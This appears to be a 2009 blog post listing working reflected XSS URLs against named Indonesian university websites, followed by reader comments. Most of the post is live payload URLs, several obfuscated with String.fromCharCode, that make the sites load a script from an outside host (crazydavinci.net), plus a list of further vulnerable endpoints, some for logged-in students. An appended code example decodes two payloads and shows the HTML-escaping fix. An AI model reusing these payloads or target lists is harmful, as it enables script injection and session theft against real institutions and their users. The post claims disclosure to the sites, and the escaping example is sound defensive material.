XSS On Indo Education Institutions
In my country it is easy to find lots of bugs on the websites of big education institutions, say ITB (Institut Teknologi Bandung), UGM (Universitas Gadjah Mada), UI (Universitas Indonesia) or IPB (Institut Pertanian Bogor / Bogor Agricultural University). How could they miss them, when they have quite good standards in computer and information technology and each of them has a Computer Science faculty? I can still remember the SQL injection on the IPB site two months ago. It is a good thing they fixed that bug, but if I am not mistaken it took them around one or two weeks to fix it after we informed them about it. Where is the admin anyway?
OK, let's go straight to the topic: XSS. Every example below is reflected XSS, a query parameter echoed back into the page without escaping. The String.fromCharCode(...) payloads all decode to the same tag, <script src="http://crazydavinci.net/xss.php"></script>; writing it as character codes means the parameter itself contains no quote characters. Here are some examples:
http://www.itb.ac.id/search/?q=Crazy-da-Vinci&start=%3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
Note: bug fixed on Monday, April 13, 2009
http://www.ugm.ac.id/index.php?page=headline&artikel=%3Cscript%20src=%22http://crazydavinci.net/xss.php%22%3E%3C/script%3E%27
http://www.digilib.ui.ac.id/opac/themes/libri2/hasilcari.jsp?query=%3Cscript%20src=%22http://crazydavinci.net/xss.php%22%3E%3C/script%3E&Submit=Cari
http://web.ipb.ac.id/~lppm/ID/index.php?view=%3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
http://bsi.ac.id/kalender/?start=%3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
Note: bug fixed around the first of June, 2009
Other pages vulnerable to XSS:
- http://bsi.ac.id/?lang=in&page=event&next=1<XSS Here>
- http://bsi.ac.id/ubsi/?cari=<XSS Here>
- http://bsi.ac.id/hadiah/?start=<XSS Here>
- http://bsi.ac.id/hadiahd1/?start=<XSS Here>
- http://jobs.bsi.ac.id/?start=<XSS Here>
For logged-in students:
- http://students.bsi.ac.id/d3/jadwaldosen.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/kalender.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/maildosen.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/suratriset.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/nilaimurni.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/archives.php?start=<XSS Here>
http://pmb.unikom.ac.id/spmb/?go=hasiltest1&page=%3Cbody%20onload=%22funtion%20MM_preloadImages(){null}%22%3E%3Cscript%20src=%22http://crazydavinci.net/xss.php%22%3E%3C/script%3E
http://www.unpak.ac.id/kegiatan?filter=%22onmouseover=%22x=document;a=x.createElement(%27script%27);a.src=%27http://crazydavinci.net/xss.php%27;x.getElementsByTagName(%27head%27)[0].appendChild(a)%22%20style=%22z-index:99;position:absolute;top:0;left:0;height:2000px;width:2000px%22
http://www.evaluasi.or.id/profile-graph.php?schoolID=044163&schoolName=%3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
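As an added example (not code from the original post), here is what the two payload styles above do once a parameter is reflected into a page, next to the output-encoding fix that stops them. The renderResults*/renderFilter* templates are hypothetical stand-ins, since the sites' own server code is not on the page; the two payloads are taken from the ITB and unpak.ac.id URLs above. The unpak payload is the attribute-context case: it closes the value="..." it lands in, adds an onmouseover handler, and styles the element as a page-sized overlay so any mouse movement fires it.

```javascript
// Added example, not code from the original post. The templates below are
// hypothetical; the real sites' server-side code is not on the page.
// Run with: node xss_reflect.js

// The ITB URL from the post (line-wrap spaces removed).
const ITB_URL =
  "http://www.itb.ac.id/search/?q=Crazy-da-Vinci&start=%3Cscript%3Edocument.write(" +
  "String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47," +
  "99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112," +
  "34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E";

// The unpak.ac.id "filter" parameter after URL-decoding. Note it ends without a
// closing quote: the template's own closing quote finishes the style attribute.
const UNPAK_FILTER =
  '"onmouseover="x=document;a=x.createElement(\'script\');' +
  "a.src='http://crazydavinci.net/xss.php';" +
  'x.getElementsByTagName(\'head\')[0].appendChild(a)" ' +
  'style="z-index:99;position:absolute;top:0;left:0;height:2000px;width:2000px';

// Read a query parameter the way the server sees it (percent-decoded).
function getParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Turn "String.fromCharCode(60,115,...)" back into the markup it builds;
// returns null when the text carries no such call.
function decodeCharCodePayload(text) {
  const m = /String\.fromCharCode\(([\d,\s]+)\)/.exec(text);
  if (!m) return null;
  return String.fromCharCode(...m[1].split(",").map((n) => parseInt(n.trim(), 10)));
}

// Hypothetical vulnerable templates: the parameter is concatenated raw,
// once into element content and once into an attribute value.
function renderResultsVulnerable(start) {
  return `<div class="results">Showing results from ${start}</div>`;
}
function renderFilterVulnerable(filter) {
  return `<input type="text" name="filter" value="${filter}">`;
}

// The fix: encode the five characters that can change HTML structure
// before the value reaches either context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderResultsFixed(start) {
  return `<div class="results">Showing results from ${escapeHtml(start)}</div>`;
}
function renderFilterFixed(filter) {
  return `<input type="text" name="filter" value="${escapeHtml(filter)}">`;
}

// Two checks on rendered output: did the reflected value open a <script>
// element, and which attributes does the <input> tag end up with?
function startsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}
function attributeNames(tagHtml) {
  return [...tagHtml.matchAll(/([\w-]+)="[^"]*"/g)].map((m) => m[1]);
}

// Summary of both cases, vulnerable beside fixed.
function demo() {
  const start = getParam(ITB_URL, "start");
  return {
    decodedPayload: decodeCharCodePayload(start),
    scriptInjectedVulnerable: startsScriptElement(renderResultsVulnerable(start)),
    scriptInjectedFixed: startsScriptElement(renderResultsFixed(start)),
    inputAttrsVulnerable: attributeNames(renderFilterVulnerable(UNPAK_FILTER)),
    inputAttrsFixed: attributeNames(renderFilterFixed(UNPAK_FILTER)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The attribute check is the one worth keeping around: the vulnerable render of the unpak payload yields five attributes (type, name, value, onmouseover, style) where the template only wrote three, while the escaped render keeps all of the payload inside the single value attribute.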
PS:
I have already informed them about this; let's just wait for them to fix it.
Let's make Indonesian sites better; don't screw them over when you find bugs.
April 23rd, 2009 at 11:15 AM
Teach me how to do XSS, bro, I want to be able to do it too.
April 23rd, 2009 at 3:32 PM
XSS is only for newbies, Bob,
hehe, Boby has already dug into plenty of methods for defacing and getting admin rights,
so just XSS surely isn't hard for him..
just give it a try like SQL injection :D, you like to play innocent :p
April 28th, 2009 at 10:16 AM
You're clever people.
May 28th, 2009 at 10:29 PM
Nice post, thanks for sharing it.
December 13th, 2009 at 3:29 PM
I don't get it, boss, I only know WS, LOTUS and DBASE.